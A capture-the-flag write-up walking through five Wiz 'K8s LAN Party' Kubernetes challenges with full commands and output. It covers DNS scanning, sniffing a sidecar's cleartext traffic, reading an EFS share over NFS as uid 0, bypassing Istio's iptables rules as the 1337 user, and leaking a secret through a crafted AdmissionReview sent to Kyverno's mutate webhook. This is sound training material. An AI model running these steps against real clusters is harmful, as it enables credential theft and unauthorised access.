Hi @all, that been a week and as usual, hackwekend session will be back with new topic, today we continuously learn about Cloud Security but more about Red team which can bring to you very cool technical hosted by Wiz.io. Let's digest
Image Not Showing Possible ReasonsLearn More →
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Link to challenge: https://k8slanparty.com/
Description
You have shell access to compromised a Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further.
As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have "loaded your machine with dnscan to ease this process for further challenges.
Hint 1
Make sure you scan the correct subnet. You can get a hint of what the correct subnet is by looking at the Kubernetes API server address in the machine’s environment variables.
Hinh 2
The cluster subnet is 10.100.0.0/16.
On this challenge, it talk about recon step, which important part when you try attack or pentest some target in internet. Because of, this endpoint will place where put the exploit or payload, if you don't find anything about that you can't do anything
With some hint, you will know about mission is scan and findout what DNS or IP can attack from your shell. It mean you need to know about knowledge about networking and CIDR. Learn more with below contents
With this type challenge and hint 1, you already know about target is network, we need to scan dns for find about stuff. Dns will help you resolve what ip of target
First of all, check currently interface by ifconfig
command, it will show us about network already in shell
If you check around this network you can see the subnetmask of ns-1262e6
is too small, 255.255.255.254
, It just only 2 network in that subnet
You can play with network and learn about CIDR or VLSM by CIDR / VLSM Calculator. It means, network attact with interface is not actually target, you think about kubernetes network because we play inside the pod.
To find the network, it often export into the enviroment variables. You can use env
command to list of them
But take a guess network range of CIDR because it just expose kubernetes host 10.100.0.1
and don't take about netmask, it means we need bruteforce to find target, two CIDR we focus on
First try with /24
, you don't get anything it means the other situation can be choiced /16
(Hint 2: give you respect, not waste much time to wait
Learn More →
dnscan -subnet <CIDR or Wildcard> # (valid: 10.100.0.0/16)
After you find the target, IP and DNS. You can test simple request to target with curl
command, if req is resq, it means HTTP work on that host
curl http://10.100.136.254
You get the flag, that just raw-string from target
Flag: wiz_k8s_lan_party{between-thousands-xxx-xxx-xxx-found-your-northen-star}
Simple challenge, but you need to do step by step to find the target. Always, Giving time for reconnaissance and you will not ever disappointed
Description
Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.
Hint 1
The sidecar container shares the same lifecycle, resources, and network namespace as the main container.
Hint 2
The machine is preloaded with
tcpdump
and can be used to sniff the sidecar's network traffic.
Hold on, this challenge will give a chance for learning how can we capture the traffic transfer between network, browser, …
So that will give you think about if not setup HTTPS
, your credentials can expose when some one do MITM attack (Man in the middle) on your network
Back to challenge 1, you need to find the the target with dnscan
in network 10.100.0.0/16,
dnscan -subnet 10.100.0.0/16
Result
10.100.171.123 reporting-service.k8s-lan-party.svc.cluster.local
When you know about target, you need to use tcpdump
to sniff and capture the contents communicate on the network, and that time network interface is actually helpful
# find your interface by ifconfig or ip addr
tcpdump -i <net-interface> host reporting-service.k8s-lan-party.svc.cluster.local -A # Like me (ns-faf90c)
Note: Use flag -A
to fetch the contents inside the package, and raw flag will expose
And your flag will reveal when you read each package not have capture, it doesn't encrypt or mask something
Flag: wiz_k8s_lan_party{good-crime-comes-xxx-xxx-xxx-in-a-sidecar}
On this challenge, you learn the way to capture and sniff the network packet transfer through internet, if you not apply any protection, hacker can capture and let't them know you are the target. Therefore, careful when apply or supply the credentials, password or anything private to anonymous website or non't
https
web
Learn more about the protection
Description
The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦️.
Hint 1
You might find it useful to look at the documentaion for nfs-cat and nfs-ls.
Hint 2
The following NFS parameters should be used in your connection string: version, uid and gid
Through this challenge, you require to read private contents which put on machine and expose via network like description
You will need skill and knowledge to actually figure out this challenge work
This challenge has a very interesting approach and has many tricks for players to test their patience
To know what tool we have, you need find $PATH
to find binary directory, and yup we find nfs
echo $PATH
ls -la /usr/local/bin
So base on the hacktricks - 2049 - Pentesting NFS Service, you can use nmap
to validate nfs is open in this host
nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 10.100.0.1
nfs protocol actually work, and you make a deal with that
After recon and discovery about folder in the host, there is at least flag.txt
contain inside the pod on /efs/flag.txt
path, but we do not permission to read them
Found mount directory, and try to figure out the target
showmount -e
and not work, just digest about that but not get any resultsdf
command instead of showmount
df -a
After that got the list of directory, take a look around the domain which efs
service of aws, with dig
command to figure out the ip of your directory or just use this url,
dig +short A fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com
Next, we use nfs-ls
command, and you can list the what contents inside the mount (NOTE: With hint2, remember provide version to can execution this command successfully)
nfs-ls nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/?version=4
Figure out nfs-cat
to read contents inside the flag.txt
file
It's insane format, when you put only /
on the request, your request will return error
nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/flag.txt?version=4"
It's mean you must need to define another guess for this efs, like pentester they often add another slash, and it works
nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4"
As you know, this challenge is messup and we ain't gonna get the flag, with hint2, we need to provide uid or guid for read the contents.
First of all, take a back to the nfs.conf
for looking the configuration
#
# This is a general configuration for the
# NFS daemons and tools
#
[general]
pipefs-directory=/run/rpc_pipefs
#
[exports]
# rootdir=/export
#
[exportfs]
# debug=0
#
[gssd]
# verbosity=0
# rpc-verbosity=0
# use-memcache=0
# use-machine-creds=1
# use-gss-proxy=0
# avoid-dns=1
# limit-to-legacy-enctypes=0
# context-timeout=0
# rpc-timeout=5
# keytab-file=/etc/krb5.keytab
# cred-cache-directory=
# preferred-realm=
#
[lockd]
# port=0
# udp-port=0
#
[mountd]
# debug=0
manage-gids=y
# descriptors=0
# port=0
# threads=1
# reverse-lookup=n
# state-directory-path=/var/lib/nfs
# ha-callout=
#
[nfsdcld]
# debug=0
# storagedir=/var/lib/nfs/nfsdcld
#
[nfsdcltrack]
# debug=0
# storagedir=/var/lib/nfs/nfsdcltrack
#
[nfsd]
# debug=0
# threads=8
# host=
# port=0
# grace-time=90
# lease-time=90
# udp=n
# tcp=y
# vers2=n
# vers3=y
# vers4=y
# vers4.0=y
# vers4.1=y
# vers4.2=y
# rdma=n
# rdma-port=20049
#
[statd]
# debug=0
# port=0
# outgoing-port=0
# name=
# state-directory-path=/var/lib/nfs/statd
# ha-callout=
# no-notify=0
#
[sm-notify]
# debug=0
# force=0
# retry-time=900
# outgoing-port=
# outgoing-addr=
# lift-grace=y
#
[svcgssd]
# principal=
Not actually helpful, so we can guess with currently shell uid=player(1001)
nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=1001"
Not right, try another guess, pick up the root id, i mean we set uid=0
nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=0"
and flag is revealed
Flag: wiz_k8s_lan_party{old-school-network-file-shares-xxx-xxx-cloud!}
Through the challenge, you will learn a lot about the patience, analysis and do more searching about technical can attack the machine, Actually I need to learn more about that
. But that is actually cool experience,Image Not Showing Possible ReasonsLearn More →
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
NFS
can do a lot but if you not protect, anything andNFS
could be turn to targer for exploiting
Learn more about NFS, common attack methodology with What Are the Dangers Of a NFS Vulnerability Or Attack?
Description
Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don't abuse this power; use it responsibly and with caution.
Hint 1
Try examining Istio's IPTables rules.
Hint 2
Try executing "cat /etc/passwd | grep 1337", to find the user that can bypass the Istio's IPTables rules
On this challenge, you back again to one of concept of Kubernetes, service mesh
What is a service mesh?
A service mesh is a software layer that handles all communication between services in applications. This layer is composed of containerized microservices. As applications scale and the number of microservices increases, it becomes challenging to monitor the performance of the services. To manage connections between services, a service mesh provides new features like monitoring, logging, tracing, and traffic control. It’s independent of each service’s code, which allows it to work across network boundaries and with multiple service management systems.
With service mesh, you can handle and do lots of things, like Service discovery, Load balancing, Traffic management, … Explore more: What is a Service Mesh?
And istio is one of names of service mesh, that use popular like a part of cluster kubernetes when setup, and your challenge is find the way to bypass the restricted route of istio and reveal the flag
First of all, we scan the dns of target which we need to attack by `dnscan
dnscan -subnet 10.100.*.*
Result scan
10.100.224.159 -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
Next, I try access with GET POST
method, but you will not have permission for access them because RBAC
applied by istio, it means we need to find the bypass the them
With hint 1, they talk about play ip table, so you can explore istio's ip tables with some articles
With a try, you will know about the istio user is really exist, with IPTable, I mean we can manipulate the access with another user because it's relating on the description. And from hint 1, you will have some information about UID and GID about 1337
account, it user for proceed the traffic from sidecar to another sidecar. Explore more: Understanding IPTables snapshot
so you can switch user into istio
to bypass the currently root user, like a trick from this implementation, i know it when open the hint 2
You can switch user by su
command
su - istio
Yup we go to the another user, istio
, so it mean we can bypass the rule whch service mesh apply which try prevent us get flag from host. Try again and reveal the flag
curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
Flag: wiz_k8s_lan_party{only-leet-hex0rs-xxx-xxx-both-k8s-and-linux}
Through the challenge, new experience when target is
istio
, first try always hard but this quite fun challenge, easy methodology but you must to understand the concept and bypass them. Not thing is always securing, therefore you must to learn and how to restrict more as possible
More best practices with istio
Description
Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative
Hint 1
Need a hand crafting AdmissionReview requests? Checkout https://github.com/anderseknert/kube-review.
Hint 2
This exercise consists of three ingredients: kyverno's hostname (which can be found via dnscan), the relevant HTTP path (which can be found in Kyverno's source code) and the AdmissionsReview request.
Last challenge, Very cool and strange vulnerables which not see as usual - lateral movement. It can bring more the interesting when it comes up with kyverno
- agent policy with work on cluster and provide the method to secure, protect data and permission in kubernetes
With challenge, you need to retrieve the flag from mutate
webhook of kyverno
but more sophisticated via AdmissionsReview
to bypass and execute lateral movement
attack, let digest about that
First of all, use dnscan
to get the target for attack process, we have a ton of endpoints
10.100.86.210 -> kyverno-cleanup-controller.kyverno.svc.cluster.local.
10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.
With the hint, i figure out we need attack to pod with kyverno via mutate
by HTTP request, supply chain with AdmissionReview
.
It means, you need to figure play with smt to create AdmissionReview
to bypass or provide when you do command run
for request to mutate
route and get the flag from response. With hint 1, This challenge suggest about kube-review - Create Kubernetes AdmissionReview requests from Kubernetes resource manifests
So we can perfomance that like example, with few step
debian
, so i always try to create a pod with debian alsok run playkube --image=debian:11.7 --dry-run=client -o yaml > playkube.yaml ;
this command will create a pod on the manifest with not apply to cluster, tail -f /dev/null
is the stuff give a change for always keep shell run for debian
or ubuntu
. Read more: StackOverFlow - How can I keep a container running on Kubernetes?, you can change that inside the manifest (Not recommendation: when you try with --command
, IDK why not work but when you create pod it will fail, make sure split them better than combine to one)
Output
# playkube.yaml
apiVersion: v1
kind: Pod
metadata:
creationTimestamp: null
labels:
run: playkube
name: playkube
spec:
containers:
- command:
- "sh"
- "-c"
- "tail -f /dev/null"
image: debian:11.7
name: playkube
resources: {}
dnsPolicy: ClusterFirst
restartPolicy: Always
status: {}
wget https://github.com/anderseknert/kube-review/releases/download/v0.3.0/kube-review-linux-amd64 -O kube-review;
and you will kube-review on your shell, change mod execution and play with kube-review
chmod +x kube-review
./kube-review create playkube.yaml > playkube.json
Output
# playkube.json
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "5f04e525-a601-4098-89e2-45bee89f96d7"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
Always already, next step you need to learn how kyverno work, like what HTTP request with mutate
mean
First of all kyverno work on port 443
, it means you need to provide request with https
to actually access kyverno, but actually on this step i don't figure out anything, and Morteza Khazamipour - writeup is actually help me. He spoils me about Kyverno
path which not relate anything in documentation, so here is it file about webhook mutate
provide by kyverno. Therefore, i have completely exploitation curl
for reaching the flag, but before doing that you need to mount json
to your pod, use cat
cat <<EOF > pod.json
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "5f04e525-a601-4098-89e2-45bee89f96d7"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
EOF
after that, you can build curl
command, like
curl --insecure -H "Content-Type: application/json" --data-binary "@pod.json" -X POST "https://kyverno-svc.kyverno.svc.cluster.local/mutate" | jq
Output
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "5f04e525-a601-4098-89e2-45bee89f96d7"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
},
"response": {
"uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115",
"allowed": true
}
}
But failure, because we make a mistake, pod should be run in the namespace and we do not, so change the playkube.yaml
with metadata.namespace: sensitive-ns
# playkube.yaml
apiVersion: v1
kind: Pod
metadata:
creationTimestamp: null
labels:
run: playkube
name: playkube
namespace: sensitive-ns
spec:
containers:
- command:
- "sh"
- "-c"
- "tail -f /dev/null"
image: debian:11.7
name: playkube
resources: {}
dnsPolicy: ClusterFirst
restartPolicy: Always
status: {}
Apply kube-review
again and put it to json
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "ca6a6def-925c-436f-98e2-d135604219b8",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"namespace": "sensitive-ns",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "bd6a3823-8e4e-44d3-bd70-8309b58d619c"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"namespace": "sensitive-ns",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
mount to pod.json and run curl
command above, you shell will response, what you need
cat <<EOF > pod.json
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "ca6a6def-925c-436f-98e2-d135604219b8",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"namespace": "sensitive-ns",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "bd6a3823-8e4e-44d3-bd70-8309b58d619c"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"namespace": "sensitive-ns",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
EOF
curl --insecure -H "Content-Type: application/json" --data-binary "@pod.json" -X POST "https://kyverno-svc.kyverno.svc.cluster.local/mutate" | jq
Output
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "ca6a6def-925c-436f-98e2-d135604219b8",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"namespace": "sensitive-ns",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "bd6a3823-8e4e-44d3-bd70-8309b58d619c"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"namespace": "sensitive-ns",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
},
"response": {
"uid": "ca6a6def-925c-436f-98e2-d135604219b8",
"allowed": true,
"patch": "W3sib3AiOiJhZGQiLCJwYXRoIjoiL3NwZWMvY29udGFpbmVycy8wL2VudiIsInZhbHVlIjpbeyJuYW1lIjoiRkxBRyIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9XX0sIHsicGF0aCI6Ii9tZXRhZGF0YS9hbm5vdGF0aW9ucyIsIm9wIjoiYWRkIiwidmFsdWUiOnsicG9saWNpZXMua3l2ZXJuby5pby9sYXN0LWFwcGxpZWQtcGF0Y2hlcyI6ImluamVjdC1lbnYtdmFycy5hcHBseS1mbGFnLXRvLWVudi5reXZlcm5vLmlvOiBhZGRlZCAvc3BlYy9jb250YWluZXJzLzAvZW52XG4ifX1d",
"patchType": "JSONPatch"
}
}
Yup, we got it the patch contents with base64, you just need to decode them, with jq, it can be easily to executed like
curl --insecure -H "Content-Type: application/json" --data-binary "@pod.json" -X POST "https://kyverno-svc.kyverno.svc.cluster.local/mutate" | jq -r ".response.patch" | base64 -d | xargs
Flag: wiz_k8s_lan_party{you-are-k8s-net-xxx-xxx-xxx-xxx-to-mutate-your-way-to-victory}
This challenge is very interesting, new supply chain and attack methodology which can exploit and reveal secrets about them. I will have a post or blog to talk more about this one. Kyverno is part of cluster which offer you more optionals to protect and retrict the access to data. More thing on this challenge need to be research, very cool challenge.
I hope you have good time and enjoy with the challenge from wiz.io, i respect and appricate what things they bring for community. I learn a lot about new methodology and supply chain attack, with practice more about red team skill and try to learn more about technologies, especially Kubernetes.
Image Not Showing Possible ReasonsLearn More →
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Maybe on next session, we will continue find out a cool things and try more challenge from others resources. Stay safe, hack and do more fun things. Be back on the next session. see ya !!!
You can find me on: